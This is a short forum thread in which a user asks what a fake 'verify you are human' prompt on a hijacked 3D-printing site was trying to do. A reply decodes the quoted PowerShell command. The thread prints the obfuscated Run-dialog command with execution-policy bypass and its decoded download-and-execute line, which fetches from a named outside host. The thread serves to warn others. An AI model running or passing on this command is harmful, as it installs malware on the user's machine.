Yeah don’t put this in but can anyone give me an idea of what they were trying to do? the website was https:\howchoo.\com\3dprinting\updating-octoprint
and used a real pc verification screen to try to get me to put this in Run

conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1

  • aubeynarf@lemmynsfw.com
    link
    fedilink
    English
    arrow-up
    21
    ·
    14 days ago

    The base 64 encoded payload is:
    $site = Invoke-RestMethod 'https://mastraw.top/me/day'; iEx $site

    it would download malware and install it on your machine